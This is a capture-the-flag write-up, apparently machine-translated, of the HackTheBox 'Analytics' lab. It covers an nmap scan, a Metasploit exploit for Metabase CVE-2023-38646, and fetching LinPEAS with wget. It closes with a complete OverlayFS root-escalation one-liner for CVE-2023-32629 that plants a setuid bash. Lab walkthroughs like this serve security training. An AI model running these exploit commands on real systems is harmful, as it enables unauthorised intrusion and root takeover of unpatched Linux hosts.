HTB Analytics. Escalating privileges with CVE-2023-32629

Greetings, kulhatzkers. Today’s write-up will be dedicated to hacking
Linux – machines with HackTheBox entitled Analytics.

Disclaimer: all utilities and techniques demonstrated in the article are provided for educational purposes.

Scanning and reconnaissance

As always, we start with scanning to identify active services.

nmap -sC -sV -Pn -p- -T4 10.10.11.234

Getting primary access using Metasploit

Based on the scan results, you can see that a web service is hanging on port 80. Let’s try to go to the web page:

This is Metabase. After surfing the Internet, we’ll find an exploit for it. The vulnerability has an ID CVE-2023-38646 and leads to remote code execution. Just what you need to get initial access. The exploit can be found at: GitHuband in Metasploit. Personally, I’ll run the exploit in Metasploit:

use exploit/linux/http/metabase_setup_token_rce

To further advance, we need to throw it on the car LinPEAS to discover ways to escalate privileges. Therefore, we will launch it on our OS python3 http.server and through wget download the script we need:

python3 -m http.server 80
wget http://10.10.16.68/linpeas.sh

Let’s launch LinPEAS:

bash ./linpeas.sh

After working, the script will find the credentials for connecting via SSH:

Let’s connect to the machine using ssh:

ssh metalytics@10.10.11.233

The flag will be located here user.txt

Privilege escalation

Let’s run it in the same way python3 http.serverlet’s throw it over wget LinPEAS and run it on the machine:

After working out the script, we will determine the version of Ubuntu and find one for it vulnerability to escalate privileges. Or you can determine the OS version using cat /etc/os-release. Privilege escalation vulnerability is due to module implementation discrepancies OverlayFS in the Linux kernel. OverlayFS is a pooled mount file system implementation that has been targeted by attackers due to the ability to gain unprivileged access through user namespaces and the presence of easily exploitable bugs. Let’s copy the load from the exploit and run it to escalate privileges:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

The car has passed!

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *